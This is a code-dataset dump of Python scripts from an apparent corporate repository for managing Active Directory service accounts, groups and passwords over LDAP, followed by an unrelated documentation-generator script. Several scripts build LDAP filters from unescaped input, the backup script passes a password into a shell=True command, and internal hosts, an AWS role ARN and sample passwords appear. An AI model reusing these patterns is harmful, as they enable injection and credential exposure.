ldap_connection.result['description'])\n sys.exit(1)\n\n # Change the account back to enabled\n ldap_connection.modify(user_dn, mod_acct)\n if ldap_connection.result['result'] != 0:\n print (\"Error enabling user: %s\" % ldap_connection.result['description'])\n sys.exit(1)\n\n# LDAP unbind\nldap_connection.unbind()\n\n# All is good\nprint ('Successfully created ' + user_dn)\n\n"
},
{
"alpha_fraction": 0.5645161271095276,
"alphanum_fraction": 0.5759625434875488,
"avg_line_length": 31.559322357177734,
"blob_id": "f75d088ec525a884ce056f7ff6011373f101d2b4",
"content_id": "662d8ee99dae24f2ed19cf60e52c1fce2cb1ad61",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1922,
"license_type": "no_license",
"max_line_length": 92,
"num_lines": 59,
"path": "/ldapremovemember.py",
"repo_name": "rossKayHe/sxg-access-mgmt",
"src_encoding": "UTF-8",
"text": "import sys, ldap3, configparser\nfrom ldap3 import Connection, ALL, core, MODIFY_DELETE\n\nbase_dn = sys.argv[1]\nusername = sys.argv[2]\ngroupname = sys.argv[3]\nuser_dn = 'CN=' + username + ',' + base_dn\ngroup_dn = 'CN=' + groupname + ',' + base_dn\nconfig = configparser.ConfigParser()\nconfig.read(sys.path[0] + '/config/app.ini')\nusr = config.get('Section1', 'username')\ndata = config.get('Section1', 'data')\n\n# LDAP connection\ntry:\n ldap_connection=Connection('ldaps://ldap0319.nordstrom.net:636',usr,data,auto_bind=True)\nexcept core.exceptions.LDAPBindError as e:\n print (\"Error connecting to LDAP server: %s\" % e)\n sys.exit(1)\n\nuser_search = ldap_connection.search(base_dn, '(&(sAMAccountName=' +\n username +\n ')(objectClass=person))',\n attributes = ['distinguishedName'])\n\n# Check the results\nif not user_search:\n print (\"User\", username, \"not found in AD:\")\n sys.exit(1)\n\ngroup_search = ldap_connection.search(base_dn, '(&(name=' +\n groupname +\n ')(objectClass=group))',\n attributes = ['distinguishedName','member'])\n\n# Check the results\nif not group_search:\n print (\"Group\", groupname, \"not found in AD:\")\n sys.exit(1)\n\nfound = False\nfor dn in ldap_connection.entries[0]['member']:\n if user_dn in dn: \n found = True\nif not found: \n print (user_dn + ' is not in ' + groupname)\n sys.exit(1)\n\nmod_list = {'member': [(MODIFY_DELETE, user_dn)]}\nldap_connection.modify(group_dn, mod_list)\n\nif ldap_connection.result['result']!=0:\n Print (\"Error removing \" + username + \"from \" + groupname)\n sys.exit(1)\n\n# LDAP unbind\nldap_connection.unbind()\n\nprint ('Successfully removed ' + username + ' from ' + groupname)\n\n"
},
{
"alpha_fraction": 0.5473506450653076,
"alphanum_fraction": 0.5642615556716919,
"avg_line_length": 33.096153259277344,
"blob_id": "394e9342f7d674120413034d2d627f54a432f105",
"content_id": "31a67dbab3ed234bc9f2be1891d79a334680f1b4",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1774,
"license_type": "no_license",
"max_line_length": 92,
"num_lines": 52,
"path": "/ldapcreategroup.py",
"repo_name": "rossKayHe/sxg-access-mgmt",
"src_encoding": "UTF-8",
"text": "import ldap3, sys, configparser\nfrom ldap3 import Connection, ALL, core\n\ngroupname = sys.argv[1]\nbase_dn = sys.argv[2]\ndesc = sys.argv[3]\nf = open(sys.path[0] + '/config/ginfo.txt', \"rb\").read()\ninfo = f.replace(b'\\n',b'\\r\\n').decode('ascii')\ngroup_dn = 'cn=' + groupname + ',' + base_dn\nconfig = configparser.ConfigParser()\nconfig.read(sys.path[0] + '/config/app.ini')\nusr = config.get('Section1', 'username')\ndata = config.get('Section1', 'data')\n\n# LDAP connection\ntry:\n ldap_connection=Connection('ldaps://ldap0319.nordstrom.net:636',usr,data,auto_bind=True)\nexcept core.exceptions.LDAPBindError as e:\n print (\"Error connecting to LDAP server: %s\" % e)\n sys.exit(1)\n\n# Check and see if group exists\nuser_search = ldap_connection.search(base_dn, '(&(name=' +\n groupname +\n ')(objectClass=group))',\n attributes = ['distinguishedName'])\n\n# Check the results\nif user_search:\n print (\"Group\", groupname, \"already exists in AD\") \n sys.exit(1)\n\nprint (info)\n\n# Lets build our group\ngroup_attrs = {'objectClass': ['group'], 'cn': groupname, \\\n 'sAMAccountName': groupname, \\\n 'groupType': '-2147483646', \\\n 'info': info, \\\n 'description': desc }\n# Add the new group\nldap_connection.add(group_dn, attributes=group_attrs)\n\nif ldap_connection.result['result'] !=0:\n print (\"Error adding new group: %s\" % ldap_connection.result['description'])\n sys.exit(1)\n\n# LDAP unbind\nldap_connection.unbind()\n\n# All is good\nprint ('Successfully created ' + group_dn)\n\n"
},
{
"alpha_fraction": 0.6009280681610107,
"alphanum_fraction": 0.6156225800514221,
"avg_line_length": 29.761905670166016,
"blob_id": "4f22271944d2bf962f7a64198357575b118b9342",
"content_id": "3864e2b67179acd340caae1749f8a4e183178ad2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1293,
"license_type": "no_license",
"max_line_length": 92,
"num_lines": 42,
"path": "/ldapdelete.py",
"repo_name": "rossKayHe/sxg-access-mgmt",
"src_encoding": "UTF-8",
"text": "import ldap3, sys, configparser\nfrom ldap3 import Connection, ALL, core\n\nobjname = sys.argv[1]\nbase_dn = sys.argv[2]\nobjtype = sys.argv[3]\nobj_dn = 'cn=' + objname + ',' + base_dn\nconfig = configparser.ConfigParser()\nconfig.read(sys.path[0] + '/config/app.ini')\nusr = config.get('Section1', 'username')\ndata = config.get('Section1', 'data')\n\n# LDAP connection\ntry:\n ldap_connection=Connection('ldaps://ldap0319.nordstrom.net:636',usr,data,auto_bind=True)\nexcept core.exceptions.LDAPBindError as e:\n print (\"Error connecting to LDAP server: %s\" % e)\n sys.exit(1)\n\n# Check and see if obj exists\nuser_search = ldap_connection.search(base_dn, '(&(name=' +\n objname +\n ')(objectClass=' + objtype + '))',\n attributes = ['distinguishedName'])\n\n# Check the results\nif not user_search:\n print (objtype, objname, \"does not exist in AD\") \n sys.exit(1)\n\n# Add the new user account\nldap_connection.delete(obj_dn)\n\nif ldap_connection.result['result'] !=0:\n print (\"Error adding new \" + objtype + \": %s\" % ldap_connection.result['description'])\n sys.exit(1)\n\n# LDAP unbind\nldap_connection.unbind()\n\n# All is good\nprint ('Successfully deleted ' + obj_dn)\n\n"
},
{
"alpha_fraction": 0.6128787994384766,
"alphanum_fraction": 0.6306818127632141,
"avg_line_length": 41.54838562011719,
"blob_id": "a4c1566a744d7f56814ce5f360805531b340f2e5",
"content_id": "b7009443583c82f00bece46b029bce476203a08c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2640,
"license_type": "no_license",
"max_line_length": 190,
"num_lines": 62,
"path": "/ldapbackup.py",
"repo_name": "rossKayHe/sxg-access-mgmt",
"src_encoding": "UTF-8",
"text": "import sys, ldap3, datetime, configparser, boto3, subprocess\nfrom botocore.config import Config\nfrom pprint import pprint\nfrom ldap3 import Server, Connection, ALL, core\n\ndns = ['Prod','Test','SVCProd', 'SVCTest']\ndn_suffix = ',OU=XMLGateway,OU=Accounts,DC=nordstrom,DC=net'\n\nconfig = configparser.ConfigParser()\nconfig.read(sys.path[0] +'/config/app.ini')\nusr = config.get('Section1', 'username')\ndata = config.get('Section1', 'data')\nawsuser = config.get('Section1', 'awsuser')\nawsdata = config.get('Section1', 'awsdata')\n\nsubprocess.run(\"/usr/local/bin/awscreds --user \" + awsuser + \" --password '\" + awsdata +\"' --role arn:aws:iam::572824850745:role/NORD-Prod_ESB-DevUsers-Team --once\", shell=True)\n\n# LDAP connection\ntry:\n ldap_connection=Connection('ldaps://ldap0319.nordstrom.net:636',usr,data,auto_bind=True)\nexcept core.exceptions.LDAPBindError as e:\n print (\"Error connecting to LDAP server: %s\" % e) \n sys.exit(1)\n\nfor base_dn in dns:\n user_search = ldap_connection.search('OU='+base_dn+dn_suffix, \n '(&(objectCategory=person)(objectClass=user)(name=*))')\n #attributes = ['NordSMPwData'])\n f = open(sys.path[0] + '/backup/' + datetime.date.today().isoformat() + base_dn + \".txt\", \"w\")\n for entry in ldap_connection.response:\n y = (entry.copy())\n del y['raw_dn']\n del y['raw_attributes']\n del y['type']\n f.write(str(y).replace('\\'','\"')+'\\n')\n f.close()\n\nif not user_search or len(ldap_connection.entries) < 1:\n print (\"Error: Searching for users\")\n sys.exit(1)\n\nfor base_dn in dns:\n group_search = ldap_connection.search('OU='+base_dn+dn_suffix,'(&(objectCategory=group)(name=*))',attributes = ['member','description','info'])\n f = open(sys.path[0] + '/backup/' + datetime.date.today().isoformat() + base_dn + \".txt\", \"a\")\n f.write('\\n\\n\\n\\n\\n')\n for entry in ldap_connection.response:\n y = (entry.copy())\n del y['raw_dn']\n del y['raw_attributes']\n del y['type']\n f.write(str(y).replace('\\'','\"')+'\\n')\n f.close()\n\nif not group_search or len(ldap_connection.entries) < 1:\n print (\"Error: Searching groups\")\n sys.exit(1)\n\n\nsession = boto3.Session(profile_name='nordstrom-federated')\ns3 = session.resource('s3', config=Config(proxies={'https': 'webproxy.nordstrom.net:8181','http': 'webproxy.nordstrom.net:8181'}))\nfor base_dn in dns:\n s3.meta.client.upload_file(sys.path[0] + '/backup/' + datetime.date.today().isoformat() + base_dn + \".txt\", 'prod-sxg-accessmgmt', datetime.date.today().isoformat() + base_dn + \".txt\")\n\n\n"
},
{
"alpha_fraction": 0.7829127311706543,
"alphanum_fraction": 0.7844329476356506,
"avg_line_length": 37.70588302612305,
"blob_id": "8742570d57f6b81ec8243b547ed8fb2642b29547",
"content_id": "ddd0510850858b139d28586cec5b49f963566b27",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 3289,
"license_type": "no_license",
"max_line_length": 141,
"num_lines": 85,
"path": "/sampleoutput.md",
"repo_name": "rossKayHe/sxg-access-mgmt",
"src_encoding": "UTF-8",
"text": "### Add a service account to a group\npython ldapaddmember.py OU=SVCTest,OU=XMLGateway,OU=Accounts,DC=nordstrom,DC=net dwtegc general-availability-exttest\n### Response\n```text\nSuccessfully added dwtegc to general-availability-exttest\n```\n\n### List service account group membership\npython ldapmemberof.py OU=SVCTest,OU=XMLGateway,OU=Accounts,DC=nordstrom,DC=net dwtegc \n### Response\n```text\n[('CN=dwtegc,OU=SVCTest,OU=XMLGateway,OU=Accounts,DC=nordstrom,DC=net',\n {'memberOf': ['CN=general-egc-exttest,OU=SVCTest,OU=XMLGateway,OU=Accounts,DC=nordstrom,DC=net']})]\n```\n\n### Remove a service account from a group\npython ldapremovemember.py OU=SVCTest,OU=XMLGateway,OU=Accounts,DC=nordstrom,DC=net dwtegc general-availability-exttest\n### Response\n```text\nSuccessfully removed dwtegc from general-availability-exttest\n```\n\n### Create a service account\npython ldapcreateuser.py aaatestUser My@P@zzW0rd OU=SVCTest,OU=XMLGateway,OU=Accounts,DC=nordstrom,DC=net nordstrom.net 'My test description'\n### Response\n```text\nSuccessfully created cn=aaatestUser,OU=SVCTest,OU=XMLGateway,OU=Accounts,DC=nordstrom,DC=net\n```\n\n### Delete a service account\npython ldapdlete.py aaatestUser OU=SVCTest,OU=XMLGateway,OU=Accounts,DC=nordstrom,DC=net person\n### Response\n```text\nSuccessfully deleted cn=aaatestUser,OU=SVCTest,OU=XMLGateway,OU=Accounts,DC=nordstrom,DC=net\n```\n\n### Create a group\npython36 ldapcreategroup.py aaaMyTestGroup2 OU=SVCTest,OU=XMLGateway,OU=Accounts,DC=nordstrom,DC=net 'My description'\n### Response\n```text\nSuccessfully created cn=aaaMyTestGroup2,OU=SVCTest,OU=XMLGateway,OU=Accounts,DC=nordstrom,DC=net\n```\n\n### Delete a group\npython ldapdlete.py aaaMyTestGroup OU=SVCTest,OU=XMLGateway,OU=Accounts,DC=nordstrom,DC=net group\n### Response\n```text\nSuccessfully deleted cn=aaaMyTestGroup,OU=SVCTest,OU=XMLGateway,OU=Accounts,DC=nordstrom,DC=net\n```\n\n### List group members\npython ldapmembers.py OU=SVCTest,OU=XMLGateway,OU=Accounts,DC=nordstrom,DC=net general-availability-exttest\n### Response\n```text\n[('CN=general-availability-exttest,OU=SVCTest,OU=XMLGateway,OU=Accounts,DC=nordstrom,DC=net',\n {'member': ['CN=svtorder,OU=SVCTest,OU=XMLGateway,OU=Accounts,DC=nordstrom,DC=net']})]\n```\n\n### Set a service account's API key\npython ldapsetapi.py OU=SVCTest,OU=XMLGateway,OU=Accounts,DC=nordstrom,DC=net dwtegc MyAPIpazz\n### Response\n```text\nNordSMPwData for dwtegc was set successfully!\n```\n\n### Set a service account password\npython ldapsetpass.py OU=SVCTest,OU=XMLGateway,OU=Accounts,DC=nordstrom,DC=net aaatestUser MudarorHqddjw18\n### Response\n```text\nActive Directory password for aaatestUser was set successfully\n```\n\n### Failed to Remove a service account from a group as it is not in the group\npython ldapremovemember.py OU=SVCTest,OU=XMLGateway,OU=Accounts,DC=nordstrom,DC=net aaatestUser general-availability-exttest\n### Response\n```text\nCN=aaatestUser,OU=SVCTest,OU=XMLGateway,OU=Accounts,DC=nordstrom,DC=net is not in general-availability-exttest\n```\n\n### Failed to Add a service account to a group as it is already in the group\npython ldapaddmember.py OU=SVCTest,OU=XMLGateway,OU=Accounts,DC=nordstrom,DC=net dwtegc general-availability-exttest\n### Response\n```text\nCN=dwtegc,OU=SVCTest,OU=XMLGateway,OU=Accounts,DC=nordstrom,DC=net is already in general-availability-exttest\n```"
},
{
"alpha_fraction": 0.6230529546737671,
"alphanum_fraction": 0.636137068271637,
"avg_line_length": 31.714284896850586,
"blob_id": "21bc8570e3f5c7831082ffc3d9b3e261d0310604",
"content_id": "78f999e3c32e25e4455e21a32b3087befe0aff18",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1605,
"license_type": "no_license",
"max_line_length": 92,
"num_lines": 49,
"path": "/ldapsetpass.py",
"repo_name": "rossKayHe/sxg-access-mgmt",
"src_encoding": "UTF-8",
"text": "import ldap3, sys, configparser\nfrom ldap3 import Connection, ALL, core, MODIFY_REPLACE\n\nbase_dn = sys.argv[1]\nusername = sys.argv[2]\npassword = sys.argv[3]\nuser_dn = 'CN=' + username + ',' + base_dn\nconfig = configparser.ConfigParser()\nconfig.read(sys.path[0] + '/config/app.ini')\nusr = config.get('Section1', 'username')\ndata = config.get('Section1', 'data')\n\n# LDAP connection\ntry:\n ldap_connection=Connection('ldaps://ldap0319.nordstrom.net:636',usr,data,auto_bind=True)\nexcept core.exceptions.LDAPBindError as e:\n print (\"Error connecting to LDAP server: %s\" % e)\n sys.exit(1)\n\n# Check and see if user exists\nuser_search = ldap_connection.search(base_dn, '(&(sAMAccountName=' +\n username +\n ')(objectClass=person))',\n attributes = ['distinguishedName'])\n\n# Check the results\nif not user_search:\n print (\"User\", username, \"not found in AD:\")\n sys.exit(1)\n\n\nPASSWORD_ATTR = \"unicodePwd\"\n\n# Set AD password\nunicode_pass = \"\\\"\" + password + \"\\\"\"\npassword_value = unicode_pass.encode(\"utf-16-le\")\nadd_pass = {PASSWORD_ATTR: [(MODIFY_REPLACE, [password_value])]}\n\n# Replace password\nldap_connection.modify(user_dn, add_pass)\nif ldap_connection.result['result'] == 0:\n print (\"Active Directory password for \" + username + \" was set successfully\")\nelse:\n sys.stderr.write('Error setting AD password for: ' + username + '\\n')\n sys.stderr.write('Message: ' + ldap_connection.result['description'] + '\\n')\n sys.exit(1)\n\n# LDAP unbind\nldap_connection.unbind()\n\n\n"
},
{
"alpha_fraction": 0.5474602580070496,
"alphanum_fraction": 0.5587480664253235,
"avg_line_length": 33.78571319580078,
"blob_id": "a1de5e4b69170304032c23adf66c4aafc0bcf898",
"content_id": "42dbdb49bfda8c474afb7a1997acaca3e7268a09",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1949,
"license_type": "no_license",
"max_line_length": 92,
"num_lines": 56,
"path": "/ldapaddmember.py",
"repo_name": "rossKayHe/sxg-access-mgmt",
"src_encoding": "UTF-8",
"text": "import sys, ldap3, configparser\nfrom ldap3 import Connection, ALL, core, MODIFY_ADD\n\nbase_dn = sys.argv[1]\nusername = sys.argv[2]\ngroupname = sys.argv[3]\nuser_dn = 'CN=' + username + ',' + base_dn\ngroup_dn = 'CN=' + groupname + ',' + base_dn\nconfig = configparser.ConfigParser()\nconfig.read(sys.path[0] + '/config/app.ini')\nusr = config.get('Section1', 'username')\ndata = config.get('Section1', 'data')\n\n# LDAP connection\ntry:\n ldap_connection=Connection('ldaps://ldap0319.nordstrom.net:636',usr,data,auto_bind=True)\nexcept core.exceptions.LDAPBindError as e:\n print (\"Error connecting to LDAP server: %s\" % e)\n sys.exit(1)\n\n# Check and see if user exists\nuser_search = ldap_connection.search(base_dn,\n '(&(name=' +\n username +\n ')(objectClass=person))',\n attributes = ['distinguishedName'])\nif not user_search:\n print (\"Error finding username: \" + username + \" in AD.\")\n sys.exit(1)\n\ngroup_search = ldap_connection.search(base_dn,\n '(&(name=' +\n groupname +\n ')(objectClass=group))',\n attributes = ['distinguishedName','member'])\nif not group_search:\n print (\"Error finding groupname: \" + groupname)\n sys.exit(1)\n\nfor dn in ldap_connection.entries[0]['member']:\n if user_dn in dn:\n print (user_dn + ' is already in ' + groupname)\n sys.exit(1)\n \n# Add account to group\nmod_list = {'member': [(MODIFY_ADD, user_dn)]}\nldap_connection.modify(group_dn, mod_list)\nif ldap_connection.result['result'] != 0:\n print (\"Error adding \" + username + \" to \" + groupname)\n sys.exit(1)\n\n# LDAP unbind\n#ldap_connection.unbind()\n\n# All is good\nprint ('Successfully added ' + username + ' to ' + groupname)\n\n"
},
{
"alpha_fraction": 0.5611222386360168,
"alphanum_fraction": 0.5781562924385071,
"avg_line_length": 30.125,
"blob_id": "8ada53b4032f76b4e8fad0c801a1c07d784ff457",
"content_id": "9907957a3ae2402826e5c205baf6a292e33b51a1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 998,
"license_type": "no_license",
"max_line_length": 92,
"num_lines": 32,
"path": "/ldapmembers.py",
"repo_name": "rossKayHe/sxg-access-mgmt",
"src_encoding": "UTF-8",
"text": "import sys, ldap3, configparser\nfrom ldap3 import Connection, ALL, core\n\nbase_dn = sys.argv[1]\ngroupname = sys.argv[2]\nconfig = configparser.ConfigParser()\nconfig.read(sys.path[0] + '/config/app.ini')\nusr = config.get('Section1', 'username')\ndata = config.get('Section1', 'data')\n\n# LDAP connection\ntry:\n ldap_connection=Connection('ldaps://ldap0319.nordstrom.net:636',usr,data,auto_bind=True)\nexcept core.exceptions.LDAPBindError as e:\n print (\"Error connecting to LDAP server: %s\" % e)\n sys.exit(1)\n\ngroup_search = ldap_connection.search(base_dn,\n '(&(name=' +\n groupname +\n ')(objectClass=group))',\n attributes = ['member'])\n\n# Check the results\nif not group_search:\n print (\"Group\", groupname, \"not found in AD:\")\n sys.exit(1)\n\nprint (ldap_connection.entries[0])\n\n# LDAP unbind\nldap_connection.unbind()\n\n\n"
},
{
"alpha_fraction": 0.7972972989082336,
"alphanum_fraction": 0.7972972989082336,
"avg_line_length": 73,
"blob_id": "62041619914f3c5113e4012fc89e331b20ba9c20",
"content_id": "4f99fd7c2a8f1d39a4773a3b1a7a2dff31c48a47",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 296,
"license_type": "no_license",
"max_line_length": 129,
"num_lines": 4,
"path": "/README.md",
"repo_name": "rossKayHe/sxg-access-mgmt",
"src_encoding": "UTF-8",
"text": "### ESB Gateway Access Management\n---\nESB Gateway access is managed through Active Directoy in Nord domain.Each APIs onboarded to ESB Gateway are assigned an AD group.\nEach consumer is assigned a service account create in AD. This service account is added to the groups related to AD for access.\n"
},
{
"alpha_fraction": 0.6213459968566895,
"alphanum_fraction": 0.6342623829841614,
"avg_line_length": 32.3863639831543,
"blob_id": "25b55cc733afc5204ed93267ade92bff4b11ad88",
"content_id": "14354ef6a00e7a7dfac42c45fc1b0630e0b5e048",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1471,
"license_type": "no_license",
"max_line_length": 92,
"num_lines": 44,
"path": "/ldapsetapi.py",
"repo_name": "rossKayHe/sxg-access-mgmt",
"src_encoding": "UTF-8",
"text": "import ldap3, sys, configparser\nfrom ldap3 import Connection, ALL, core, MODIFY_REPLACE\n\nbase_dn = sys.argv[1]\nusername = sys.argv[2]\nuser_dn = 'CN=' + username + ',' + base_dn\nnordSMPwData = sys.argv[3]\nconfig = configparser.ConfigParser()\nconfig.read(sys.path[0] + '/config/app.ini')\nusr = config.get('Section1', 'username')\ndata = config.get('Section1', 'data')\n\n# LDAP connection\ntry:\n ldap_connection=Connection('ldaps://ldap0319.nordstrom.net:636',usr,data,auto_bind=True)\nexcept core.exceptions.LDAPBindError as e:\n print (\"Error connecting to LDAP server: %s\" % e)\n sys.exit(1)\n\n# Check and see if user exists\nuser_search = ldap_connection.search(base_dn, '(&(name=' +\n username +\n ')(objectClass=person))',\n attributes = ['distinguishedName'])\n\n# Check the results\nif not user_search:\n print (\"User\", username, \"not found in AD:\")\n sys.exit(1)\n\n# Set NordSMPwData value\nadd_pass = {'NordSMPwData': [(MODIFY_REPLACE, nordSMPwData)]}\n\n# Replace password\nldap_connection.modify(user_dn, add_pass)\nif ldap_connection.result['result'] == 0:\n print (\"NordSMPwData for \" + username + \" was set successfully\")\nelse:\n sys.stderr.write('Error setting NordSMPwData for: ' + username + '\\n')\n sys.stderr.write('Message: ' + ldap_connection.results['description'] + '\\n')\n sys.exit(1)\n\n# LDAP unbind\nldap_connection.unbind()\n\n\n"
},
{
"alpha_fraction": 0.590010404586792,
"alphanum_fraction": 0.6077002882957458,
"avg_line_length": 29.967741012573242,
"blob_id": "8baa1af4ed40b3d726e872e434253cf85bbad4fc",
"content_id": "0751f5049dfd150548fb9bace348ddd2c1ac5a3f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 961,
"license_type": "no_license",
"max_line_length": 92,
"num_lines": 31,
"path": "/ldapmemberof.py",
"repo_name": "rossKayHe/sxg-access-mgmt",
"src_encoding": "UTF-8",
"text": "import sys, ldap3, configparser\nfrom ldap3 import Connection, ALL, core\n\nbase_dn = sys.argv[1]\nusername = sys.argv[2]\nconfig = configparser.ConfigParser()\nconfig.read(sys.path[0] + '/config/app.ini')\nusr = config.get('Section1', 'username')\ndata = config.get('Section1', 'data')\n\n# LDAP connection\ntry:\n ldap_connection=Connection('ldaps://ldap0319.nordstrom.net:636',usr,data,auto_bind=True)\nexcept core.exceptions.LDAPBindError as e:\n print (\"Error connecting to LDAP server: %s\" % e)\n sys.exit(1)\n\nuser_search = ldap_connection.search(base_dn, '(&(sAMAccountName=' +\n username +\n ')(objectClass=person))',\n attributes = ['memberof'])\n\n# Check the results\nif not user_search: \n print (\"User\", username, \"not found in AD:\")\n sys.exit(1)\n\nprint (ldap_connection.entries[0])\n\n# LDAP unbind\nldap_connection.unbind()\n\n"
}
] | 12 |
dhenderson/datadocs
|
https://github.com/dhenderson/datadocs
|
812a99b66cfe0ba6b91afdae58ef12c91e2cc9e9
|
a7575b13ac9b3c9d9e79e56ec0f977cb5f288f93
|
ac62c85e230e2e767aa588292f184feec6f45cdf
|
refs/heads/master
| 2021-01-17T07:58:44.307422 | 2016-06-13T00:50:11 | 2016-06-13T00:50:11 | 40,070,446 | 4 | 1 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5752987265586853,
"alphanum_fraction": 0.576708972454071,
"avg_line_length": 34.177547454833984,
"blob_id": "587c8330636458caa3489a3dd921135a174cff00",
"content_id": "332f23c490b91e57d40f433fd19ed981ef769429",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 13473,
"license_type": "no_license",
"max_line_length": 134,
"num_lines": 383,
"path": "/makedocs.py",
"repo_name": "dhenderson/datadocs",
"src_encoding": "UTF-8",
"text": "import pandas as pd\nimport os, shutil\nfrom jinja2 import Environment, PackageLoader\nimport yaml\nimport os.path\nimport json\nimport markdown\n\nclass FieldError(Exception):\n \"\"\"\n Class to inform the user of a field error in her or\n his yaml configuration.\n \"\"\"\n def __init__(self, dataset, field):\n self.dataset = dataset\n self.field = field\n self.value = \"%s field in the %s dataset (is the %s field missing?)\" % (self.field, self.dataset, self.field)\n def __str__(self):\n return repr(self.field)\n\nclass Dataset():\n \"\"\"\n A dataset is a csv file that is either in the root /data directory or housed in\n a DataFolder anywhere in /data.\n\n Args:\n name String full name of this dataset (such as \"test.csv\")\n title String human readable title\n description String description\n \"\"\"\n def __init__(self, name, title = None, description = None):\n self.name = name\n self.title = title\n self.description = description\n self.categories = []\n\n def addCategory(self, category):\n \"\"\"\n Add a category object to the category list.\n Args:\n category Category object\n \"\"\"\n self.categories.append(category)\n\n def getFieldNames(self):\n \"\"\"\n Returns a list of field names in this dataset\n \"\"\"\n fieldNames = []\n for category in self.categories:\n for field in category.fields:\n fieldNames.append(field.name)\n return fieldNames\n\n def getHtmlName(self, appendText=None):\n \"\"\"\n Returns a string takign the file name and turning it into a\n reasonable html file name that strips white space and .csv\n\n Args:\n appendText String optional text to append to the end of the\n html file name.\n \"\"\"\n htmlName = self.name.replace(' ', '_')\n htmlName = htmlName.replace('.csv', '')\n if appendText:\n htmlName += \"_\" + appendText\n htmlName += '.html'\n return htmlName\n\n def addUncategorizedFields(self, df):\n \"\"\"\n Adds all fields that have not been documented by the user\n to a category called \"Uncategorized\" and add the\n category to this dataset.\n\n Args:\n df Pandas dataframe.\n \"\"\"\n\n # create an uncategorized category\n uncategorized = Category(\"Uncategorized\", \"Autogenerated list of fields that have not been documented.\")\n documentedFieldNames = self.getFieldNames()\n\n for fieldName in list(df.columns.values):\n if fieldName not in documentedFieldNames:\n # this field name is not documented, so\n # let's add it to the list of uncategorized\n # fields\n field = Field(fieldName)\n field.dataType = field.getDataType(df)\n\n # add the field to the category\n uncategorized.addField(field)\n\n # add the category\n self.addCategory(uncategorized)\n\n def printSelectAll(self, language = \"R\"):\n \"\"\"\n Prints code in the specified language that selects all fields\n in this dataset.\n\n Args:\n language String indicating the language to select all variables in.\n \"\"\"\n code = \"\"\n if language.lower() == \"r\":\n\n # TODO: fix last comma issue\n\n code += \"c(\\n\"\n\n for category in self.categories:\n code += \" # %s\\n\" % category.title\n\n for field in category.fields:\n code += ' \"%s\",\\n' % field.name\n code += \")\"\n elif language.lower() == \"python\":\n\n code += \"[\\n\"\n for category in self.categories:\n code += \" # %s\\n\" % category.title\n\n for field in category.fields:\n code += ' \"%s\",\\n' % field.name\n code += \"]\"\n\n return code\n\n def countFields(self):\n \"\"\"\n Counts the number of fields in this dataset.\n \"\"\"\n\n fieldCount = 0\n for category in self.categories:\n fieldCount += len(category.fields)\n return fieldCount\n\n\nclass Category():\n \"\"\"\n A category holds any number of fields in a dataset\n \"\"\"\n def __init__(self, title, description = None):\n \"\"\"\n Args:\n title String title\n description String description\n \"\"\"\n self.title = title\n self.description = description\n self.fields = []\n\n def addField(self, field):\n self.fields.append(field)\n\nclass Field():\n \"\"\"\n A field in a dataset.\n \"\"\"\n def __init__(self, name, description=None, private=False, transformed=False, percentNotNA=None):\n \"\"\"\n Args:\n name String field name in the dataset\n description String field description\n private Boolean indicating if a field is private or public\n transformed Boolean indicating if a field is raw (False) or has gone\n through some transformation process (True).\n percentNotNA Numeric field indicating percentage of observations not NA\n \"\"\"\n self.name = name\n self.description = description\n self.percentNotNA = percentNotNA\n self.dataType = None\n self.private = private\n self.transformed = transformed\n\n def getDataType(self, df):\n \"\"\"\n Guesses the datatype of the field of a dataframe.\n Args:\n df Pandas dataframe this field is in\n Return:\n Returns a string guessing the field's data type.\n \"\"\"\n\n # the datatype map maps pandas data types to user friendly types\n dataTypeMap = {\n \"object\" : \"Text\",\n \"int64\" : \"Numeric\",\n \"float64\" : \"Numeric\",\n \"bool\" : \"Boolean\",\n \"date\" : \"Date\",\n \"categorical\" : \"Categorical\"\n }\n\n # set the data type\n dataType = dataTypeMap[str(df[self.name].dtype)]\n\n # look for special cases where we guess a different datatype\n if \"date\" in fieldName.lower():\n dataType = dataTypeMap[\"date\"]\n # check if a text datatype is actually categorical\n elif dataType == \"Text\":\n # if there are fewer than k unique answers, then guess it's categorical\n numberOfUniqueAnswers = len(df[self.name].value_counts())\n if numberOfUniqueAnswers < 20: # TODO: This is kind of a hack, might think of a better solution\n dataType = dataTypeMap[\"categorical\"]\n\n return dataType\n\ndef generateSearch(datasets):\n \"\"\"\n Generates a JSON file that allows users to search fields across datasets.\n\n Args:\n datasets A list of dataset objects.\n Return:\n Returns a JSON file that is a list of dictionaries, where\n each dictionary defines a field.\n \"\"\"\n\n search = []\n\n for dataset in datasets:\n categoryNumber = 1\n for category in dataset.categories:\n fieldNumber = 1\n for field in category.fields:\n search.append({\n \"field\" : field.name,\n \"description\": field.description,\n \"category\" : category.title,\n \"dataset\" : dataset.title,\n \"field_link\" : \"%s#field-%d-%d\" % (dataset.getHtmlName(), categoryNumber, fieldNumber),\n \"category_link\" : \"%s#category-%d\" % (dataset.getHtmlName(), categoryNumber),\n \"dataset_link\" : \"%s\" % (dataset.getHtmlName())\n })\n fieldNumber += 1\n categoryNumber += 1\n\n # return as json\n return json.dumps(search)\n\nif __name__ == \"__main__\":\n \"\"\"\n Loop through every dataset in the datadocs yaml\n file.\n \"\"\"\n\n # remove the /docs dir if it exists\n if os.path.exists(\"site\"):\n shutil.rmtree('site')\n # if docs doesn't exist, which it shouldn't, make it again\n if not os.path.exists('site'):\n os.makedirs('site')\n\n # get the data docs settings\n datadocs = yaml.load(open(\"docs/datadocs.yaml\", \"r\"))\n showUncategorized = 